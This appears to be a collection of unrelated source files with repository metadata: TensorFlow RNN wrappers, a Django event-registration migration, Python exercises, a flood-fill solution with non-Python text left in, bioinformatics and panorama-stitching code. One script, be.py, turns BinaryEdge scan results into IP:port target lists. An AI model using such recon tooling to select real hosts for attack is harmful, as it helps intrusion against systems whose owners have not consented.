    # Default scope: "InputProjectionWrapper"
    with tf.variable_scope(scope or type(self).__name__):
      projected = linear(inputs, self._cell.input_size, True)
    return self._cell(projected, state)
class DropoutWrapper(RNNCell):
  """Operator adding dropout to inputs and outputs of the given cell."""

  def __init__(self, cell, input_keep_prob=1.0, output_keep_prob=1.0,
               seed=None):
    """Create a cell with added input and/or output dropout.

    Dropout is never used on the state.

    Args:
      cell: an RNNCell, a projection to output_size is added to it.
      input_keep_prob: unit Tensor or float between 0 and 1, input keep
        probability; if it is float and 1, no input dropout will be added.
      output_keep_prob: unit Tensor or float between 0 and 1, output keep
        probability; if it is float and 1, no output dropout will be added.
      seed: (optional) integer, the randomness seed.

    Raises:
      TypeError: if cell is not an RNNCell.
      ValueError: if keep_prob is not between 0 and 1.
    """
    if not isinstance(cell, RNNCell):
      raise TypeError("The parameter cell is not a RNNCell.")
    if (isinstance(input_keep_prob, float) and
        not (input_keep_prob >= 0.0 and input_keep_prob <= 1.0)):
      raise ValueError("Parameter input_keep_prob must be between 0 and 1: %d"
                       % input_keep_prob)
    if (isinstance(output_keep_prob, float) and
        not (output_keep_prob >= 0.0 and output_keep_prob <= 1.0)):
      # BUG FIX: this message previously named input_keep_prob.
      raise ValueError("Parameter output_keep_prob must be between 0 and 1: %d"
                       % output_keep_prob)
    self._cell = cell
    self._input_keep_prob = input_keep_prob
    self._output_keep_prob = output_keep_prob
    self._seed = seed

  @property
  def input_size(self):
    return self._cell.input_size

  @property
  def output_size(self):
    return self._cell.output_size

  @property
  def state_size(self):
    return self._cell.state_size

  def __call__(self, inputs, state, scope=None):
    """Run the cell with the declared dropouts.

    CONSISTENCY FIX: every other RNNCell.__call__ in this module accepts an
    optional `scope` argument (per the RNNCell contract); this wrapper now
    does too (default None preserves the old behavior) and forwards it to
    the wrapped cell.
    """
    # Non-float keep probs are Tensors, so dropout must always be applied.
    if (not isinstance(self._input_keep_prob, float) or
        self._input_keep_prob < 1):
      inputs = tf.nn.dropout(inputs, self._input_keep_prob, seed=self._seed)
    output, new_state = self._cell(inputs, state, scope)
    if (not isinstance(self._output_keep_prob, float) or
        self._output_keep_prob < 1):
      output = tf.nn.dropout(output, self._output_keep_prob, seed=self._seed)
    return output, new_state
class EmbeddingWrapper(RNNCell):
  """Operator adding input embedding to the given cell.

  Note: in many cases it may be more efficient to not use this wrapper,
  but instead concatenate the whole sequence of your inputs in time,
  do the embedding on this batch-concatenated sequence, then split it and
  feed into your RNN.
  """

  def __init__(self, cell, embedding_classes=0, embedding=None,
               initializer=None):
    """Create a cell with an added input embedding.

    Args:
      cell: an RNNCell, an embedding will be put before its inputs.
      embedding_classes: integer, how many symbols will be embedded.
      embedding: Variable, the embedding to use; if None, a new embedding
        will be created; if set, then embedding_classes is not required.
      initializer: an initializer to use when creating the embedding;
        if None, the initializer from variable scope or a default one is used.

    Raises:
      TypeError: if cell is not an RNNCell.
      ValueError: if embedding_classes is not positive.
    """
    if not isinstance(cell, RNNCell):
      raise TypeError("The parameter cell is not RNNCell.")
    if embedding_classes < 1 and embedding is None:
      raise ValueError("Pass embedding or embedding_classes must be > 0: %d."
                       % embedding_classes)
    if embedding_classes > 0 and embedding is not None:
      # NOTE(review): TF Variables normally expose get_shape(), not a
      # `.size` attribute -- confirm what object type `embedding` is
      # expected to be here; as written this looks like it would raise
      # AttributeError for a plain tf.Variable.
      if embedding.size[0] != embedding_classes:
        raise ValueError("You declared embedding_classes=%d but passed an "
                         "embedding for %d classes." % (embedding.size[0],
                                                        embedding_classes))
      if embedding.size[1] != cell.input_size:
        raise ValueError("You passed embedding with output size %d and a cell"
                         " that accepts size %d." % (embedding.size[1],
                                                     cell.input_size))
    self._cell = cell
    self._embedding_classes = embedding_classes
    self._embedding = embedding
    self._initializer = initializer

  @property
  def input_size(self):
    # The wrapped graph consumes one symbol id per timestep.
    return 1

  @property
  def output_size(self):
    return self._cell.output_size

  @property
  def state_size(self):
    return self._cell.state_size

  def __call__(self, inputs, state, scope=None):
    """Run the cell on embedded inputs."""
    with tf.variable_scope(scope or type(self).__name__):  # "EmbeddingWrapper"
      # Embedding lookups are kept on the CPU (common for large tables).
      with tf.device("/cpu:0"):
        # NOTE(review): truthiness of a graph-mode TF Variable can be
        # ambiguous; `if self._embedding is not None:` may be intended.
        if self._embedding:
          embedding = self._embedding
        else:
          if self._initializer:
            initializer = self._initializer
          elif tf.get_variable_scope().initializer:
            initializer = tf.get_variable_scope().initializer
          else:
            # Default initializer for embeddings should have variance=1.
            sqrt3 = math.sqrt(3)  # Uniform(-sqrt(3), sqrt(3)) has variance=1.
            initializer = tf.random_uniform_initializer(-sqrt3, sqrt3)
          embedding = tf.get_variable("embedding", [self._embedding_classes,
                                                    self._cell.input_size],
                                      initializer=initializer)
        # Flatten the [batch x 1] symbol ids before the lookup.
        embedded = tf.nn.embedding_lookup(
            embedding, tf.reshape(inputs, [-1]))
    return self._cell(embedded, state)
class MultiRNNCell(RNNCell):
  """RNN cell composed sequentially of multiple simple cells."""

  def __init__(self, cells):
    """Create a RNN cell composed sequentially of a number of RNNCells.

    Args:
      cells: list of RNNCells that will be composed in this order.

    Raises:
      ValueError: if cells is empty (not allowed) or if their sizes don't match.
    """
    if not cells:
      raise ValueError("Must specify at least one cell for MultiRNNCell.")
    # BUG FIX: `xrange` is Python 2 only; this module already uses
    # `from __future__` imports for 2/3 compatibility, so use `range`
    # (behavior-identical, and works on Python 3).
    for i in range(len(cells) - 1):
      if cells[i + 1].input_size != cells[i].output_size:
        raise ValueError("In MultiRNNCell, the input size of each next"
                         " cell must match the output size of the previous one."
                         " Mismatched output size in cell %d." % i)
    self._cells = cells

  @property
  def input_size(self):
    return self._cells[0].input_size

  @property
  def output_size(self):
    return self._cells[-1].output_size

  @property
  def state_size(self):
    # States of all layers are packed into one flat vector.
    return sum([cell.state_size for cell in self._cells])

  def __call__(self, inputs, state, scope=None):
    """Run this multi-layer cell on inputs, starting from state."""
    with tf.variable_scope(scope or type(self).__name__):  # "MultiRNNCell"
      cur_state_pos = 0
      cur_inp = inputs
      new_states = []
      for i, cell in enumerate(self._cells):
        with tf.variable_scope("Cell%d" % i):
          # Slice this layer's state out of the packed state vector.
          cur_state = tf.slice(
              state, [0, cur_state_pos], [-1, cell.state_size])
          cur_state_pos += cell.state_size
          cur_inp, new_state = cell(cur_inp, cur_state)
          new_states.append(new_state)
    return cur_inp, tf.concat(1, new_states)
def linear(args, output_size, bias, bias_start=0.0, scope=None):
  """Linear map: sum_i(args[i] * W[i]), where W[i] is a variable.

  Args:
    args: a 2D Tensor or a list of 2D, batch x n, Tensors.
    output_size: int, second dimension of W[i].
    bias: boolean, whether to add a bias term or not.
    bias_start: starting value to initialize the bias; 0 by default.
    scope: VariableScope for the created subgraph; defaults to "Linear".

  Returns:
    A 2D Tensor with shape [batch x output_size] equal to
    sum_i(args[i] * W[i]), where W[i]s are newly created matrices.

  Raises:
    ValueError: if some of the arguments has unspecified or wrong shape.
  """
  assert args
  if not isinstance(args, (list, tuple)):
    args = [args]

  # Validate that every argument is 2D with a known second dimension,
  # then add those dimensions up to size the weight matrix.
  shapes = [a.get_shape().as_list() for a in args]
  for shape in shapes:
    if len(shape) != 2:
      raise ValueError("Linear is expecting 2D arguments: %s" % str(shapes))
    if not shape[1]:
      raise ValueError("Linear expects shape[1] of arguments: %s" % str(shapes))
  total_arg_size = sum(shape[1] for shape in shapes)

  with tf.variable_scope(scope or "Linear"):
    matrix = tf.get_variable("Matrix", [total_arg_size, output_size])
    # A single argument can skip the concat.
    combined = args[0] if len(args) == 1 else tf.concat(1, args)
    res = tf.matmul(combined, matrix)
    if not bias:
      return res
    bias_term = tf.get_variable(
        "Bias", [output_size],
        initializer=tf.constant_initializer(bias_start))
    return res + bias_term
| [
"mhzx20@163.com"
] | mhzx20@163.com |
7f7cdc92c7f32efe6d16d4b8c49496d69f5ae071 | 0cf8b481274d13ed6e6f3f5ab9ee2b14f78129a4 | /backend/src/articles/migrations/0001_initial.py | a1356cbeeec3c26113b3ab6b8d4aa59db97946e2 | [] | no_license | TrellixVulnTeam/Dbms_MBGW | 25a53b37d2c0394be599daa9ef1891fabfe4908b | 8920d2b005671e55efbf52ff0d03b573aa8bc8f2 | refs/heads/master | 2023-03-15T15:00:00.305864 | 2019-05-05T19:45:13 | 2019-05-05T19:45:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,456 | py | # Generated by Django 2.1.5 on 2019-05-05 16:55
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the event-management app (auto-generated by Django).

    Creates the Events, Organizer, Student, PaymentSuccess, Registration and
    Transactions tables, then wires up the foreign keys and the
    (participant, event) uniqueness constraint.  Do not hand-edit field
    definitions here after the migration has been applied.
    """

    # First migration of this app: nothing to depend on.
    initial = True

    dependencies = [
    ]

    operations = [
        # Event catalogue; event_id is a free-form string primary key.
        migrations.CreateModel(
            name='Events',
            fields=[
                ('event_date', models.DateField()),
                ('event_type', models.CharField(choices=[('s', 'Sports'), ('t', 'Technical'), ('c', 'Cultural')], max_length=20)),
                ('event_div', models.CharField(choices=[('w', 'workshop'), ('comp', 'competition'), ('conf', 'conference')], max_length=20)),
                ('event_id', models.CharField(max_length=120, primary_key=True, serialize=False)),
                ('event_name', models.CharField(max_length=30)),
                ('poster_img', models.CharField(max_length=500)),
                ('reg_fee', models.IntegerField(default=0)),
                ('event_desc', models.CharField(max_length=20000)),
            ],
        ),
        # Society organizers; ident_no doubles as the primary key.
        migrations.CreateModel(
            name='Organizer',
            fields=[
                ('name', models.CharField(max_length=120)),
                ('email_id', models.EmailField(max_length=254)),
                ('phone_no', models.IntegerField()),
                ('userType', models.CharField(default='x', max_length=1)),
                ('society', models.CharField(choices=[('TNT', 'Thapar Nautanki Team'), ('SCIM', 'Scimatics'), ('IETE', 'The Institution of Electronics and Telecommunication Engineers'), ('CCS', 'Creative Computing Society'), ('LitSoc', 'Literary Society'), ('Mudra', 'Music and Drama Society'), ('FAPS', 'FINE ARTS AND PHOTOGRAPHY SOCIETY')], max_length=20)),
                ('ident_no', models.IntegerField(primary_key=True, serialize=False)),
            ],
            options={
                'abstract': False,
            },
        ),
        # Successful payment records keyed by external transaction id.
        migrations.CreateModel(
            name='PaymentSuccess',
            fields=[
                ('transaction_id', models.CharField(max_length=100, primary_key=True, serialize=False)),
                ('dateOfPayment', models.DateField()),
                ('registration_id', models.CharField(default='', max_length=100)),
            ],
        ),
        # Join table between students and events (many-to-many "through").
        migrations.CreateModel(
            name='Registration',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('registration_id', models.CharField(default='', max_length=100)),
                ('email_alerts', models.BooleanField(default=True)),
                ('event_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Events')),
            ],
        ),
        # Students; event_part uses Registration as the through model.
        migrations.CreateModel(
            name='Student',
            fields=[
                ('name', models.CharField(max_length=120)),
                ('email_id', models.EmailField(max_length=254)),
                ('phone_no', models.IntegerField()),
                ('userType', models.CharField(default='x', max_length=1)),
                ('roll_no', models.IntegerField(primary_key=True, serialize=False)),
                ('event_part', models.ManyToManyField(through='articles.Registration', to='articles.Events')),
            ],
            options={
                'abstract': False,
            },
        ),
        # Raw transaction log (ids stored as plain strings, no FKs).
        migrations.CreateModel(
            name='Transactions',
            fields=[
                ('student_id', models.CharField(max_length=100)),
                ('event_id', models.CharField(max_length=100)),
                ('transaction_id', models.CharField(max_length=100, primary_key=True, serialize=False)),
                ('reg_fee', models.IntegerField(default=0)),
            ],
        ),
        # Deferred FK additions to break the circular model references.
        migrations.AddField(
            model_name='registration',
            name='part_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Student'),
        ),
        migrations.AddField(
            model_name='events',
            name='organizer_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Organizer'),
        ),
        # A student may register for a given event at most once.
        migrations.AlterUniqueTogether(
            name='registration',
            unique_together={('part_id', 'event_id')},
        ),
    ]
| [
"anish.mendiratta@gmail.com"
] | anish.mendiratta@gmail.com |
87a23af5f698baae4449c2df99047b6047ead027 | 9fc136019eb91f00ad4aaf25a3d721016410b691 | /201.2/_filter.py | ec89bcce5d6ae784eb9d42dab0b4746cb20bf876 | [] | no_license | kubruslihiga/curso_python | 02626005db141bb1d35e08effa57d9fd467e6ae6 | a64befc0a53042a7616e4460c58add4ae4e5f6e0 | refs/heads/master | 2020-06-04T11:19:08.928302 | 2019-06-14T20:07:13 | 2019-06-14T20:07:13 | 191,999,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | def filter_division_8(my_list):
return list(filter(lambda x: x % 8 == 0, my_list))
print(filter_division_8([0, 1, 8, 16, 54, 34, 12, 45, 64]))
| [
"teste@teste.com"
] | teste@teste.com |
ef1f73ac545d810881ae472c0b7440b0b94ec766 | 8bb367e6a730af9c1e4145bcd26615d9ea24f010 | /employeemanagementsystem/pollapp/admin.py | e6cc56495762f37c7896a1e0eb52a2261869100d | [] | no_license | bhanugithubb/ems | 772a8347e787332bd9594335ad91aa64d15c4f6e | f1277db13717f0bd7cdb24930941ff0db4541346 | refs/heads/main | 2023-01-06T13:19:24.079249 | 2020-11-09T06:45:05 | 2020-11-09T06:45:05 | 311,245,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 180 | py | from django.contrib import admin
# Register your models here.
from pollapp.models import *
admin.site.register(Question)
admin.site.register(Choice)
admin.site.register(Answer)
| [
"bhanugithub@gmail.com"
] | bhanugithub@gmail.com |
04a68ad3ab8b4ec6864b03ef75267f662293f58b | 665f255c8a2cad2952696f67423ea20895607dbc | /home/migrations/0001_initial.py | 2a3e69a6b0f1e387e3c172807b2a66f9e6e0da40 | [] | no_license | brajeswar009/GeekyWorld | 4af8dea70b686f15bf40881eee2074f56650bf0e | f1dc8f9dff612adde48400a8d2c4d1535cfca7be | refs/heads/master | 2023-04-23T04:16:56.922320 | 2021-05-13T11:36:44 | 2021-05-13T11:36:44 | 297,211,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | # Generated by Django 3.1.1 on 2020-09-18 09:57
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('sno', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('email', models.CharField(max_length=100)),
('content', models.TextField()),
('timeStamp', models.DateTimeField(auto_now_add=True)),
],
),
]
| [
"brajeswar.lenka@gmail.com"
] | brajeswar.lenka@gmail.com |
5a8ff86f8aac8001fcbcefd81abf93f19556a628 | e58a944df179b9b792c4640cb587a5d40ebdabd0 | /be.py | a30bbf794754c3a3039f22d38fc59119c1a5dd12 | [] | no_license | kalikex1/be-targets-gen | 1cadefd79ce1b0dc0bf793683fa62b82f936e33e | 0f97487df522f4b28ca20c8a295ad68742f9f810 | refs/heads/master | 2023-06-09T18:29:54.874111 | 2020-04-17T09:24:40 | 2020-04-17T09:24:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | #!/usr/bin/env python3
#
# Targets Generator to parse binaryedge.io json blob
#
# python3 be.py -f b3cef281-4s1a-4k45-8lv6-d42196c63b5f
#
# Author: RandomRobbieBF
import json
import argparse
import sys
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", required=True, help="Binary Edge Json File")
args = parser.parse_args()
fname = args.file
try:
with open(fname) as f:
for line in f:
json_string = json.loads(line)
IP = json_string["target"]["ip"]
PORT = str(json_string["target"]["port"])
URL = ""+IP+":"+PORT+""
print (URL)
text_file = open(""+fname+".txt", "a")
text_file.write(""+URL+"\n")
text_file.close()
except KeyboardInterrupt:
print ("Ctrl-c pressed ...")
sys.exit(1)
except Exception as e:
print('Error: %s' % e)
sys.exit(1)
| [
"noreply@github.com"
] | kalikex1.noreply@github.com |
b22e16d140a7a9a6a2c7f916d502601d2b841de3 | f002387dfd7c8ccf66b6467f45b8376d14fbe021 | /B5/B5.py | 26c113fe61abeddf10c42484966021561e00648c | [] | no_license | Tarun-msrit/pylab | d37e7ef5d892d723d2a3cb9615e9283f4d942478 | 5248aed668ea0f232fca4f86b9ef9999d85e5ec6 | refs/heads/master | 2020-08-21T15:55:54.112355 | 2019-11-20T17:31:01 | 2019-11-20T17:31:01 | 216,162,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | import sys
import os
from functools import reduce
dict={}
wordLen=[]
if(len(sys.argv)!=2):
print("Invalid arguments")
sys.exit()
if(not(os.path.exists(sys.argv[1]))):
print("invalid file path")
sys.exit()
if(sys.argv[1].split('.')[-1]!="txt"):
print("invalid File Format. Only TXT files allowed")
with open(sys.argv[1]) as file:
for line in file:
for word in line.split():
dict[word]=dict.get(word,0)+1
print(dict)
sl=[]
sl=sorted(dict.items(),key=lambda x:x[1],reverse=True)
print(sl[:10])
word=[]
for i,j in sl[:10]:
word.append(len(i))
print(word)
sum=reduce((lambda x,y:x+y),word)
print ("sum is",sum)
avg=sum/len(word)
print ("Avg is",avg)
sq=[]
sq=[x*x for x in word if x%2 != 0]
print(sq) | [
"tarun.ragothaman@gmail.com"
] | tarun.ragothaman@gmail.com |
adbfff0ec7d9153be0fa04207d65d82f79536304 | 31b6e455820b6930992ce5f3e4e4d4ec8516c9ec | /mymod/mod2.py | 848f4b1e7c79da2fc3afdf13385b70613ce4c869 | [] | no_license | blackcow59/Jump-to-python | fa699337f2dd3579e717a1e08430d0a561c79c8c | f5b05f369772599811866e4674a63f232655ec4b | refs/heads/master | 2023-02-20T13:41:32.485999 | 2021-01-24T08:18:31 | 2021-01-24T08:18:31 | 329,690,563 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | PI = 3.141592
class Math :
def solv(self, r) :
return PI * (r ** 2)
def add(a, b) :
return a + b
| [
"choi8695@gmail.com"
] | choi8695@gmail.com |
ba31752daebd6125e2355792eb7cbce0f3cd9586 | 03f05bb069e6b24b35f60206210710b944739b48 | /test.py | 42d933e1b246a7eb41c80c669838803a233703b9 | [] | no_license | steven159486/test | bb407c09b3bd13a102fa78c0f7d94fa315384856 | 3ffc50ba8f63b00856879fdc904ea8a1184a95fe | refs/heads/master | 2022-12-05T11:51:49.988607 | 2020-08-25T02:41:44 | 2020-08-25T02:41:44 | 290,093,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10 | py | imoprt os
| [
"steven159486@gmail.com"
] | steven159486@gmail.com |
6f1bae782360db20439167864f836fc8db51e16b | b4f2b3b8c8a5c6015ad90facf3d4b2c031f9d1a6 | /Python1100/Study/MyFunc.py | 99630495df005a9271b0e3d7f56ec642eee2f204 | [] | no_license | soft9000/Python1000 | 141b0d0cf99d26ff915a28c40d27179ec9dc1490 | d63179cad6a8ac6285d972a9566da75d767e7bc8 | refs/heads/master | 2022-11-12T11:53:33.215224 | 2020-07-11T07:18:49 | 2020-07-11T07:18:49 | 268,032,418 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 181 | py |
# Adding Documentation
def MyFunc():
""" This is a docstring """
print("Hello World")
MyFunc() # Call it (optional)
input("Press the enter key to continue....")
| [
"noreply@github.com"
] | soft9000.noreply@github.com |
ab35af3c24ceb2783a0fb929e5e3ee4e727ea248 | 869693633a0ff3081906d93fd77c7315f26c1f1e | /lab8import.py | aca7387b532e002fd4d7ed3d7ffe88be4131a46e | [] | no_license | neKeyoff/Python_Task-of-University | 91036930e004b1a86335a1b4d4100109ab7b1c0a | 9ddb3df49d77c18c426e2b834321573ca1ef2c09 | refs/heads/main | 2023-08-20T11:23:45.293309 | 2021-10-30T16:24:28 | 2021-10-30T16:24:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | import random
import math
def f1(x1, x2):
return float(x1) + float(x2)
def f2(x1, x2):
return x1 - x2
def f3(x1, x2):
return x1 * x2
def f4(x1, x2):
return x1 / x2
def f5(x1, x2):
return pow(x1, x2)
def f6(x):
return abs(x)
def f7(x1, x2):
return random.uniform(x1, x2)
def f8(x):
return math.factorial(x)
def f9(x):
return math.acos(x) | [
"78197151+neKeyoff@users.noreply.github.com"
] | 78197151+neKeyoff@users.noreply.github.com |
78b9354c6c32861f115d542c379f97fbb94db9d6 | 3bc38b6fc9570217143d056762be4bf52db2eb1f | /leetcode_practice/733.py | 04891ca0037b51b72b6e6aab58a893d403d3b54f | [] | no_license | yangyuebfsu/ds_study | 6638c260dfdb4a94365c2007d302833b455a4a59 | 883f9bab2dbce4f80f362c30b8564a942f66fb1e | refs/heads/master | 2021-02-07T13:20:54.773840 | 2021-01-21T05:55:09 | 2021-01-21T05:55:09 | 244,031,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,880 | py | ***
733. Flood Fill
Easy
1121
190
Add to List
Share
An image is represented by a 2-D array of integers, each integer representing the pixel value of the image (from 0 to 65535).
Given a coordinate (sr, sc) representing the starting pixel (row and column) of the flood fill, and a pixel value newColor, "flood fill" the image.
To perform a "flood fill", consider the starting pixel, plus any pixels connected 4-directionally to the starting pixel of the same color as the starting pixel, plus any pixels connected 4-directionally to those pixels (also with the same color as the starting pixel), and so on. Replace the color of all of the aforementioned pixels with the newColor.
At the end, return the modified image.
Example 1:
Input:
image = [[1,1,1],[1,1,0],[1,0,1]]
sr = 1, sc = 1, newColor = 2
Output: [[2,2,2],[2,2,0],[2,0,1]]
Explanation:
From the center of the image (with position (sr, sc) = (1, 1)), all pixels connected
by a path of the same color as the starting pixel are colored with the new color.
Note the bottom corner is not colored 2, because it is not 4-directionally connected
to the starting pixel.
***
class Solution:
def floodFill(self, image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:
area=[]
oldColor=image[sr][sc]
def search_area(x,y):
if ( [x,y] in area)|(x<0)|(x>len(image)-1)|(y<0)|(y>len(image[0])-1):
return
elif image[x][y]!=oldColor:
return
else:
area.append([x,y])
search_area(x-1,y)
search_area(x+1,y)
search_area(x,y-1)
search_area(x,y+1)
search_area(sr,sc)
for point in area:
image[point[0]][point[1]]=newColor
return image
| [
"yueyang@yuedeMacBook-Pro.local"
] | yueyang@yuedeMacBook-Pro.local |
78a9d21635b3b2f9d4282deb74507c8b86a89628 | ea2015881c18583a4295122f2e2c1d2dbd3e32f9 | /_pipeline_scripts/script_6.4.3_ps_prot_pairDave.py | 6b12ef0ebf30ba4e369c2c941843af7dcdf42b21 | [] | no_license | panchyni/PseudogenePipeline | ad0b210d943bfdc83da1eeb63c0d7dec2a8719ae | 44a5bfd034dfd9b21808b6e6c5b789f141912c33 | refs/heads/master | 2021-01-11T15:54:57.514872 | 2017-04-17T21:13:16 | 2017-04-17T21:13:16 | 79,955,253 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 651 | py |
import sys
print "Read protein sequence file..."
inp = open(sys.argv[1])
inl = inp.readlines()
p = {}
for i in inl:
if i[0] == ">":
g = i[1:-1].split(".")
if g[0] not in p:
p[g[0]] = [g[1]]
else:
p[g[0]].append(g[1])
print "Read pair file..."
inp = open(sys.argv[2]) # osv5_ps_gene.pairs
oup = open("osv5_ps_prot.pairs","w")
inl = inp.readlines()
miss = []
for i in inl:
L = i[:-1].split("\t")
if L[1] in p:
for j in p[L[1]]:
oup.write("%s\t%s.%s\n" % (L[0],L[1],j))
else:
if L[1] not in miss:
miss.append(L[1])
print "The following genes are not in the prot seq file:"
for i in miss:
print "",i
print "Done!"
| [
"panchyni.msu.edu"
] | panchyni.msu.edu |
7fc926973ef2d59e20c9d57230e6563df921d769 | a4497fa4e254216b50071c7967e2b821b7b61f30 | /Project7b/manual.py | ad98269f58a6e7d81a74605ac5fae0a62a61cbd8 | [] | no_license | TungTNguyen/computational_photography | c740871f90d3e55464acc929386306cd6c31be45 | 5f707c2cc0c7d41d415b1eaadcdbdd0d58430e9b | refs/heads/master | 2021-01-12T06:08:05.949269 | 2015-12-30T07:25:41 | 2015-12-30T07:25:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,213 | py | #================================================================================
#
# University of California, Berkeley
# CS194-26 (CS294-26): Computational Photography
#
#================================================================================
#
# Project 7 - Part A: "Image Warping and Mosaicing - Homographies"
#
# Student: Ian Albuquerque Raymundo da Silva
# Email: ian.albuquerque@berkeley.edu
#
#================================================================================
#
# Special thanks to Alexei Alyosha Efros, Rachel Albert and Weilun Sun for help
# during lectures, office hours and questions on Piazza.
#
#================================================================================
#================================================================================
# CONSTANTS AND SETTINGS
#================================================================================
RECTIFICATION_FILE_NAME = "inputs/rectification/times_square.jpg"
PLANAR_PANORAMA_FOLDER = "inputs/planar"
CYLINDRICAL_PANORAMA_FOLDER = "inputs/cylindrical"
PANORAMA_360_FOLDER = "inputs/360"
F_FRACTION_OF_WIDTH = 0.75
RESULTING_RECTIFICATION_WIDTH = 800
RESULTING_RECTIFICATION_HEIGHT = 600
RECTIFICATION_BORDER_FRACTION = 0.1
#================================================================================
# THE CODE ITSELF
#================================================================================
from skimage.draw import polygon
import numpy as np
import matplotlib.pyplot as plt
import math
import copy
import transforms
import pointselecter
import imageio
#================================================================================
def defineMergedImageDimensions(image_1, image_2, H):
image_1_height = image_1.shape[0]
image_2_height = image_2.shape[0]
image_1_width = image_1.shape[1]
image_2_width = image_2.shape[1]
img1_pts = [(0,0),(image_1_width-1,0),(0,image_1_height-1),(image_1_width-1,image_1_height-1)]
img2_pts = [(0,0),(image_2_width-1,0),(0,image_2_height-1),(image_2_width-1,image_2_height-1)]
trans_img1_pts = []
for pt in img1_pts:
trans_img1_pts.append(transforms.applyHomogTransformation(H,pt))
pts_to_check = trans_img1_pts + img2_pts
pts_x, pts_y = zip(*pts_to_check)
top_left = (min(pts_x),min(pts_y))
bottom_right = (max(pts_x),max(pts_y))
return top_left, bottom_right
def generateDistMask(W,H):
mask = np.zeros((H,W))
pixels = np.where(mask == 0)
for y,x in zip(pixels[0],pixels[1]):
mask[y,x] = min([1,min([y,H-y,x,W-x])**0.90/(0.1*max([W,H])/2)])
return mask
def fill(source,target,T,current_source_mask=None):
source_height = source.shape[0]
source_width = source.shape[1]
target_height = target.shape[0]
target_width = target.shape[1]
pts_source = [(0,0),(source_width-1,0),(source_width-1,source_height-1),(0,source_height-1)]
pts_target = []
for pt in pts_source:
pts_target.append(transforms.applyHomogTransformation(T,pt))
pts_target_x, pts_target_y = zip(*pts_target)
is_someone_in = False
for pt in pts_target:
if pt[0] < target_width and pt[0] >= 0 and pt[1] < target_height and pt[1] >= 0:
is_someone_in = True
break
if is_someone_in:
fill_mask = np.zeros((target_height,target_width))
rr, cc = polygon(np.array(pts_target_y), np.array(pts_target_x),fill_mask.shape)
fill_mask[rr, cc] = 1
target_pixels = np.where(fill_mask == 1)
else:
fill_mask = np.ones((target_height,target_width))
target_pixels = np.where(fill_mask == 1)
T_inv = np.linalg.inv(T)
transformed_mask = np.zeros((target_height,target_width))
if current_source_mask == None:
blend_mask = generateDistMask(source_width,source_height)
else:
blend_mask = current_source_mask
mask_height = blend_mask.shape[0]
mask_width = blend_mask.shape[1]
for y,x in zip(target_pixels[0],target_pixels[1]):
original_pixel_coords = transforms.applyHomogTransformation(T_inv,(x,y))
original_pixel_x = int(original_pixel_coords[0])
original_pixel_y = int(original_pixel_coords[1])
if original_pixel_x < source_width and original_pixel_x >= 0 and original_pixel_y < source_height and original_pixel_y >= 0:
original_pixel = source[original_pixel_y,original_pixel_x]
else:
original_pixel = 0
if original_pixel_x < mask_width and original_pixel_x >= 0 and original_pixel_y < mask_height and original_pixel_y >= 0:
mask_pixel = blend_mask[original_pixel_y,original_pixel_x]
else:
mask_pixel = 0
transformed_mask[y,x] = mask_pixel
if target[y,x][0] == 0 or target[y,x][1] == 0 or target[y,x][1] == 0:
target[y,x] = original_pixel
else:
target[y,x] = original_pixel*transformed_mask[y,x] + (1-transformed_mask[y,x])*target[y,x]
return target
def merge(image_1, image_2, H, mask = None):
image_1_height = image_1.shape[0]
image_2_height = image_2.shape[0]
image_1_width = image_1.shape[1]
image_2_width = image_2.shape[1]
top_left_float, bottom_right_float = defineMergedImageDimensions(image_1, image_2, H)
top_left = (int(math.floor(top_left_float[0])),int(math.floor(top_left_float[1])))
bottom_right = (int(math.ceil(bottom_right_float[0])),int(math.ceil(bottom_right_float[1])))
result_height = bottom_right[1] - top_left[1] + 1
result_width = bottom_right[0] - top_left[0] + 1
result_image = 0*np.ones((result_height,result_width,3))
T = np.matrix([[1,0,-top_left[0]],[0,1,-top_left[1]],[0,0,1]])
result_image = fill(image_2,result_image,T,mask)
result_image = fill(image_1,result_image,np.dot(T,H),mask)
empty_pixels = np.where(result_image == 0)
result_image[empty_pixels] = 0
return result_image
def projectOnCylinder(source,current_source_mask=None):
source_height = source.shape[0]
source_width = source.shape[1]
W = source_width
H = source_height
F = F_FRACTION_OF_WIDTH*W
result_image = np.zeros((H,W,3))
target_pixels = np.where(result_image == 0)
if current_source_mask == None:
blend_mask = generateDistMask(source_width,source_height)
else:
blend_mask = current_source_mask
transformed_mask = np.zeros((H,W))
for y,x in zip(target_pixels[0],target_pixels[1]):
original_pixel_coords = transforms.fromCylinderToPlane(x,y,W/2.0,H/2.0,F)
original_pixel_x = int(original_pixel_coords[0])
original_pixel_y = int(original_pixel_coords[1])
if original_pixel_x < source_width and original_pixel_x >= 0 and original_pixel_y < source_height and original_pixel_y >= 0:
original_pixel = source[original_pixel_y,original_pixel_x]
mask_pixel = blend_mask[original_pixel_y,original_pixel_x]
else:
original_pixel = 0
mask_pixel = 0
transformed_mask[y,x] = mask_pixel
result_image[y,x] = original_pixel
return result_image, transformed_mask
